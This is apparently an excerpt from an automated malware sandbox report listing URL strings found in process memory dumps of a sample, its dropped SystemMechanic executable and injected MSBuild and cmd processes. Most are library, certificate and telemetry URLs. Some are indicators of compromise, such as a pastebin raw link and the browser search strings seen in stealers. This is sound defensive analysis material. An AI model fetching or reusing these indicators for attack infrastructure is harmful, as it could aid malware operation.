                              Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3032814487.0000020EEB850000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3007357797.0000020E9007E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.codeplex.com/DotNetZip
                              Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2395167883.0000020EE863B000.00000002.00000001.01000000.00000015.sdmpString found in binary or memory: http://www.codeplex.com/prism
                              Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3024422327.0000020EEB3A0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2395167883.0000020EE863B000.00000002.00000001.01000000.00000015.sdmpString found in binary or memory: http://www.codeplex.com/prism#Microsoft.Practices.Prism.ViewModel
                              Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3030420251.0000020EEB7A0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3032814487.0000020EEB850000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3045117994.0000020EEC0C0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3024035894.0000020EEB370000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3027055139.0000020EEB550000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2395167883.0000020EE863B000.00000002.00000001.01000000.00000015.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3007357797.0000020E9007E000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3007357797.0000020E900C3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/CPS0
                              Source: VucRf0jboS.exe, 00000000.00000003.2187851077.00000000075EE000.00000004.00000020.00020000.00000000.sdmp, run.exe, 00000003.00000002.1994802884.0000000003E2F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000006.00000002.2324902407.0000000004A36000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000E.00000002.2322322233.00000000039CF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000F.00000002.2524262276.0000000004C35000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
                              Source: VucRf0jboS.exe, 00000000.00000003.2187851077.0000000007202000.00000004.00000020.00020000.00000000.sdmp, u5qk.3.exe, 00000009.00000000.2186967041.000000000041C000.00000020.00000001.01000000.0000000E.sdmp, u5qk.3.exe, 00000009.00000003.2489838469.0000000002832000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.indyproject.org/
                              Source: run.exe, 00000003.00000002.1994802884.0000000003DD9000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000006.00000002.2324902407.00000000049ED000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000E.00000002.2322322233.0000000003979000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000F.00000002.2524262276.0000000004BEC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.info-zip.org/
                              Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.2976971378.0000020E80001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.iolo.com/products/byepass/welcome/?utm_source=bp&utm_medium=product&p=d59cc353-e8e4-4f42-
                              Source: u5qk.0.exe, u5qk.0.exe, 00000001.00000002.2565455301.000000006BACD000.00000002.00000001.01000000.00000012.sdmpString found in binary or memory: http://www.mozilla.com/en-US/blocklist/
                              Source: u5qk.0.exe, 00000001.00000002.2562843633.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp, u5qk.0.exe, 00000001.00000002.2531006330.000000001E779000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.sqlite.org/copyright.html.
                              Source: run.exe, 00000003.00000002.1994802884.0000000003E2F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000006.00000002.2324902407.0000000004A36000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000E.00000002.2322322233.00000000039CF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000F.00000002.2524262276.0000000004C35000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.symauth.com/cps0(
                              Source: run.exe, 00000003.00000002.1994802884.0000000003E2F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000006.00000002.2324902407.0000000004A36000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000E.00000002.2322322233.00000000039CF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000F.00000002.2524262276.0000000004C35000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.symauth.com/rpa00
                              Source: run.exe, 00000003.00000002.1994802884.0000000003E2F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000006.00000002.2324902407.0000000004A36000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000E.00000002.2322322233.00000000039CF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000F.00000002.2524262276.0000000004C35000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.vmware.com/0
                              Source: run.exe, 00000003.00000002.1994802884.0000000003E2F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000006.00000002.2324902407.0000000004A36000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000E.00000002.2322322233.00000000039CF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000F.00000002.2524262276.0000000004C35000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.vmware.com/0/
                              Source: MSBuild.exe, 0000000D.00000002.2980273016.0000000002508000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.2980273016.0000000002991000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.2980273016.000000000253F000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.2980273016.00000000025A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                              Source: MSBuild.exe, 0000000D.00000002.2980273016.0000000002508000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.2980273016.0000000002991000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.2980273016.000000000253F000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.2980273016.00000000025A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                              Source: MSBuild.exe, 0000000D.00000002.2980273016.0000000002508000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.2980273016.0000000002991000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.2980273016.000000000253F000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.2980273016.00000000025A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                              Source: MSBuild.exe, 0000000D.00000002.2980273016.0000000002508000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.2980273016.0000000002991000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.2980273016.000000000253F000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.2980273016.00000000025A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                              Source: run.exe, 00000003.00000002.1994802884.0000000003E2F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000006.00000002.2324902407.0000000004A36000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000E.00000002.2322322233.00000000039CF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000F.00000002.2524262276.0000000004C35000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://d.symcb.com/cps0%
                              Source: run.exe, 00000003.00000002.1994802884.0000000003E2F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000006.00000002.2324902407.0000000004A36000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000E.00000002.2322322233.00000000039CF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000F.00000002.2524262276.0000000004C35000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://d.symcb.com/rpa0
                              Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.2976971378.0000020E80239000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dc.services.visualstudio.com
                              Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3024794413.0000020EEB3E0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2395167883.0000020EE863B000.00000002.00000001.01000000.00000015.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3007357797.0000020E900C3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dc.services.visualstudio.com/Jhttps://rt.services.visualstudio.com/Fhttps://profiler.monitor
                              Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.2976971378.0000020E80239000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dc.services.visualstudio.com/Ptr
                              Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.2976971378.0000020E80239000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dc.services.visualstudio.com/X
                              Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3007357797.0000020E900C3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dc.services.visualstudio.com/api/profiles/
                              Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3024794413.0000020EEB3E0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2395167883.0000020EE863B000.00000002.00000001.01000000.00000015.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3007357797.0000020E900C3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dc.services.visualstudio.com/f
                              Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.2976971378.0000020E80239000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dc.services.visualstudio.com/v2/track
                              Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.2976971378.0000020E80001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://download.avira.com/download/
                              Source: u5qk.3.exe, 00000009.00000003.2489838469.00000000027F4000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://download.iolo.net/sm/24/11A12794-499E-4FA0-A281-A9A9AA8B2685/24.3.0.57/SystemMechanic.exe.6-
                              Source: MSBuild.exe, 0000000D.00000002.2980273016.0000000002508000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.2980273016.0000000002991000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.2980273016.000000000253F000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.2980273016.00000000025A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                              Source: MSBuild.exe, 0000000D.00000002.2980273016.000000000253F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                              Source: MSBuild.exe, 0000000D.00000002.2980273016.0000000002508000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.2980273016.0000000002991000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.2980273016.00000000025A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtabS
                              Source: MSBuild.exe, 0000000D.00000002.2980273016.0000000002508000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.2980273016.0000000002991000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.2980273016.000000000253F000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.2980273016.00000000025A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                              Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3030420251.0000020EEB7A0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2395167883.0000020EE863B000.00000002.00000001.01000000.00000015.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3007357797.0000020E900C3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/JamesNK/Newtonsoft.Json
                              Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3024794413.0000020EEB3E0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2395167883.0000020EE863B000.00000002.00000001.01000000.00000015.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.2976971378.0000020E80381000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3007357797.0000020E900C3000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3044688870.0000020EEC0A0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3007357797.0000020E9001C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Microsoft/ApplicationInsights-dotnet
                              Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2395167883.0000020EE863B000.00000002.00000001.01000000.00000015.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3044688870.0000020EEC0A0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3007357797.0000020E9001C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Microsoft/ApplicationInsights-dotnetw
                              Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3025984320.0000020EEB490000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/itfoundry/Poppins)
                              Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3034111147.0000020EEB9D0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/itfoundry/Poppins)&&&&l
                              Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3034111147.0000020EEB9D0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/itfoundry/Poppins)&&&&m
                              Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3034111147.0000020EEB9D0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2395167883.0000020EE863B000.00000002.00000001.01000000.00000015.sdmpString found in binary or memory: https://github.com/itfoundry/Poppins)&&&&o
                              Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3034111147.0000020EEB9D0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2395167883.0000020EE863B000.00000002.00000001.01000000.00000015.sdmpString found in binary or memory: https://github.com/itfoundry/Poppins)&&&&r
                              Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3034111147.0000020EEB9D0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2395167883.0000020EE863B000.00000002.00000001.01000000.00000015.sdmpString found in binary or memory: https://github.com/itfoundry/Poppins)&&&&s
                              Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3034111147.0000020EEB9D0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2395167883.0000020EE863B000.00000002.00000001.01000000.00000015.sdmpString found in binary or memory: https://github.com/itfoundry/Poppins)&&&&v
                              Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3034111147.0000020EEB9D0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2395167883.0000020EE863B000.00000002.00000001.01000000.00000015.sdmpString found in binary or memory: https://github.com/itfoundry/Poppins)&&&&z
                              Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3025984320.0000020EEB490000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/itfoundry/Poppins)5
                              Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3007357797.0000020E900C3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/microsoft/ApplicationInsights-dotnet/issues/2560
                              Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3056804511.0000020EEFEA2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://indiantypefoundry.com
                              Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.2976971378.0000020E80001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://iolo.azure-api.net/ent/v1
                              Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.2976971378.0000020E80001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://iolo.comH42652B74-0AD8-4B60-B8FD-69ED38F7666B
                              Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3007357797.0000020E900C3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://monitor.azure.com//.default
                              Source: MSBuild.exe, 00000012.00000002.2537639959.00000000029C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com/raw/z9pYkqPQ
                              Source: MSBuild.exe, 00000012.00000002.2537639959.00000000029C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com/raw/z9pYkqPQPO
                              Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.2976971378.0000020E80239000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://profiler.monitor.azure.com/
                              Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.2976971378.0000020E80239000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://profiler.monitor.azure.com/Ptr
                              Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3024794413.0000020EEB3E0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2395167883.0000020EE863B000.00000002.00000001.01000000.00000015.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3007357797.0000020E900C3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://profiler.monitor.azure.com/l
                              Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.2976971378.0000020E80239000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://profiler.monitor.azure.com/p
                              Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.2976971378.0000020E80239000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://rt.services.visualstudio.com/Ptr
                              Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3024794413.0000020EEB3E0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2395167883.0000020EE863B000.00000002.00000001.01000000.00000015.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3007357797.0000020E900C3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://rt.services.visualstudio.com/l
                              Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.2976971378.0000020E80239000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://rt.services.visualstudio.com/p
                              Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3025984320.0000020EEB461000.00000004.00000020.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3056804511.0000020EEFEA2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://scripts.sil.org/OFL
                              Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2395167883.0000020EE863B000.00000002.00000001.01000000.00000015.sdmpString found in binary or memory: https://scripts.sil.org/OFLThis
                              Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3056804511.0000020EEFEA2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://scripts.sil.org/OFLX8
                              Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2395167883.0000020EE863B000.00000002.00000001.01000000.00000015.sdmpString found in binary or memory: https://scripts.sil.org/OFLhttps://indiantypefoundry.comNinad
                              Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3020284753.0000020EE90C5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://scripts.sil.org/OFLins
                              Source: VucRf0jboS.exe, 00000000.00000003.2187851077.00000000075EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sectigo.com/CPS0D
                              Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.2976971378.0000020E80239000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://snapshot.monitor.azure.com/
                              Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3024794413.0000020EEB3E0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2395167883.0000020EE863B000.00000002.00000001.01000000.00000015.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3007357797.0000020E900C3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://snapshot.monitor.azure.com/&
                              Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.2976971378.0000020E80239000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://snapshot.monitor.azure.com/X
                              Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.2976971378.0000020E80239000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://snapshot.monitor.azure.com/p
                              Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.2976971378.0000020E80001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.iolo.com/support/solutions/articles/44001781185
                              Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3034111147.0000020EEB9D0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2395167883.0000020EE863B000.00000002.00000001.01000000.00000015.sdmpString found in binary or memory: https://support.iolo.com/support/solutions/articles/44001781185?
                              Source: u5qk.0.exe, 00000001.00000003.2284077697.000000002A91C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                              Source: u5qk.0.exe, 00000001.00000003.2284077697.000000002A91C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF
                              Source: u5qk.0.exe, 00000001.00000003.1902115702.00000000246FD000.00000004.00000020.00020000.00000000.sdmp, u5qk.0.exe, 00000001.00000002.2490144933.0000000000549000.00000040.00000001.01000000.00000005.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
                              Source: u5qk.0.exe, 00000001.00000002.2490144933.0000000000549000.00000040.00000001.01000000.00000005.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016.exe
                              Source: u5qk.0.exe, 00000001.00000003.1902115702.00000000246FD000.00000004.00000020.00020000.00000000.sdmp, u5qk.0.exe, 00000001.00000002.2490144933.0000000000549000.00000040.00000001.01000000.00000005.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
                              Source: u5qk.0.exe, 00000001.00000002.2490144933.0000000000549000.00000040.00000001.01000000.00000005.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17chost.exe
                              Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2395167883.0000020EE863B000.00000002.00000001.01000000.00000015.sdmpString found in binary or memory: https://taskscheduler.codeplex.com/
                              Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2395167883.0000020EE863B000.00000002.00000001.01000000.00000015.sdmpString found in binary or memory: https://taskscheduler.codeplex.com/H
                              Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.2976971378.0000020E80001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://webhooklistenersfunc.azurewebsites.net/api/lookup/constella-dark-web-alerts
                              Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.2976971378.0000020E80394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://westus2-2.in.applicationinsights.azure.com
                              Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.2976971378.0000020E80239000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://westus2-2.in.applicationinsights.azure.com/
                              Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.2976971378.0000020E80001000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.2976971378.0000020E80239000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://westus2-2.in.applicationinsights.azure.com/;LiveEndpoint=https://westus2.livediagnostics.mon
                              Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.2976971378.0000020E80239000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://westus2-2.in.applicationinsights.azure.com/v2/track
                              Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.2976971378.0000020E80239000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://westus2.livediagnostics.monitor.azure.com/
                              Source: VucRf0jboS.exe, 00000000.00000003.2187851077.00000000075EE000.00000004.00000020.00020000.00000000.sdmp, run.exe, 00000003.00000002.1994802884.0000000003E2F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000006.00000002.2324902407.0000000004A36000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000E.00000002.2322322233.00000000039CF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000F.00000002.2524262276.0000000004C35000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.digicert.com/CPS0
